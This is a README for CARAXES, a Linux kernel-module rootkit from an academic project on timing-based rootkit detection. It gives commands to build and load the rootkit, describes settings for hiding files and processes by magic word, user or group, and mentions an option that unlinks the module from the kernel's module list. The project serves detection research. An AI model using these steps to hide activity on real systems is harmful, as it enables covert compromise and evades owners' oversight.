This repository contains the Linux kernel module (LKM) rootkit CARAXES, which stands for Cyber Analytics Rootkit for Automated and eXploratory Evaluation Scenarios. The rootkit can be used to hide files, directories, and processes. In addition, we use the rootkit to evaluate anomaly detection approaches based on kernel function timings - check out this repository for details. The rootkit is designed for Linux kernel versions of 6 and above, and was tested with kernel versions 5.15-6.11.
Important Disclaimer: Caraxes is purely for educational and academic purposes. The software is provided "as is" and the authors are not responsible for any damage or mishaps that may occur during its use. Do not attempt to use Caraxes to violate the law. Misuse of the provided software and information may result in criminal charges.
If you use any of the resources provided in this repository, please cite the following publication:
- Landauer, M., Alton, L., Lindorfer, M., Skopik, F., Wurzenberger, M., & Hotwagner, W. (2025). Trace of the Times: Rootkit Detection through Temporal Anomalies in Kernel Activity. Under Review.
First, install the following dependencies. Make sure to install the correct header libraries for your kernel: linux-headers-$(uname -r) should work on debian-like systems (see code below). On arch-like systems try pacman -S linux-headers or pacman -S linux-zen-headers instead.
ubuntu@ubuntu:~$ sudo apt update
ubuntu@ubuntu:~$ sudo apt install python3-bpfcc make gcc flex bison linux-headers-$(uname -r)Second, download and compile the rootkit from this repository.
ubuntu@ubuntu:~$ git clone https://github.com/ait-aecid/caraxes.git
ubuntu@ubuntu:~$ cd caraxes/
ubuntu@ubuntu:~/caraxes$ sudo makeTo test the rootkit, try to run ls in the directory - you should see several files as depicted below. Run sudo insmod caraxes.ko to load the rootkit into the kernel. Now, run ls again - all files that contain the magic word "caraxes" are hidden from the user. To make the files visible, just remove the rootkit from the kernel using sudo rmmod caraxes.
ubuntu@ubuntu:~/caraxes$ ls
LICENSE README.md caraxes.mod caraxes.o hooks.h modules.order
Makefile caraxes.c caraxes.mod.c caraxes_logo.svg hooks_filldir.h rootkit.h
Module.symvers caraxes.ko caraxes.mod.o ftrace_helper.h hooks_getdents64.h stdlib.h
ubuntu@ubuntu:~/caraxes$ sudo insmod caraxes.ko
ubuntu@ubuntu:~/caraxes$ ls
LICENSE Module.symvers ftrace_helper.h hooks_filldir.h modules.order stdlib.h
Makefile README.md hooks.h hooks_getdents64.h rootkit.h
ubuntu@ubuntu:~/caraxes$ sudo rmmod caraxes
ubuntu@ubuntu:~/caraxes$ ls
LICENSE README.md caraxes.mod caraxes.o hooks.h modules.order
Makefile caraxes.c caraxes.mod.c caraxes_logo.svg hooks_filldir.h rootkit.h
Module.symvers caraxes.ko caraxes.mod.o ftrace_helper.h hooks_getdents64.h stdlib.h
ubuntu@ubuntu:~/caraxes$ make cleanThe magic word that determines whether a file is hidden by the rootkit or not is defined in variable MAGIC_WORD in the file rootkit.h; by default, the magic word is "caraxes". This file also allows to set the variables USER_HIDE and GROUP_HIDE, which can be used to hide files or processes that belong to the specified user or group. By default, files and processes of user 1001 and group 21 (fax) are hidden.
Optionally, uncomment the hide_module() in caraxes.c to unlink the module from the modules list. Note that the name of the module that you load (caraxes.ko) has to contain the magic word (it does by default), otherwise it will show up under /sys/modules.
Another option is to switch from getdents hooking to filldir hooking by commenting and uncommenting the respective lines in hooks.h.
Keep in mind that if you unlink the module from the modules list (uncommenting of hide_module()), then rmmod will not find it and you will have to somehow signal to the rootkit to unhide itself with show_module(). If you get into that situation and the unhide does not work, or the kernel module crashed on rmmodor similar, a system restart should always do the trick.
In case that you run into problems when installing the kernel header libraries, try to uninstall all headers and only install the ones for your kernel.
ubuntu@ubuntu:~/caraxes$ sudo apt remove linux-headers-*
ubuntu@ubuntu:~/caraxes$ sudo apt install linux-headers-$(uname -r)If you want to extend the code, the easiest way is to debug the code is to uncomment the calls to rk_info and printk or add your own, then monitor dmesg on insert / remove with sudo dmesg -w.
/proc/net/{tcp,udp} list open ports in a single file instead of one by port.
This can be addressed either by mangling with the read* syscalls or tcp4_seq_show(), which fills the content of this file.
Additionally /sys/class/net shows statistics of network activity, which could hint to an open port.
Also getsockopt would fail when trying to bind to an open port - we would kind of have to flee, give up our port,
and start using a different one.
Caraxes is purely for educational and academic purposes. The software is provided "as is" and the authors are not responsible for any damage or mishaps that may occur during its use.
Do not attempt to use Caraxes to violate the law. Misuse of the provided software and information may result in criminal charges.
- sw1tchbl4d3/generic-linux-rootkit: forked from https://codeberg.org/sw1tchbl4d3/generic-linux-rootkit
- Diamorphine:
linux_direntelement removal code from Diamorphine ftrace_helper.h: https://github.com/ilammy/ftrace-hook, edited to fit as a library instead of a standalone rootkit.- https://xcellerator.github.io/posts/linux_rootkits_01/, got me into rootkits and helped me gain most of the knowledge to make this. Much of the code is inspired by the code found here.
If you use any of the resources provided in this repository, please cite the following publication:
- Landauer, M., Alton, L., Lindorfer, M., Skopik, F., Wurzenberger, M., & Hotwagner, W. (2025). Trace of the Times: Rootkit Detection through Temporal Anomalies in Kernel Activity. Under Review.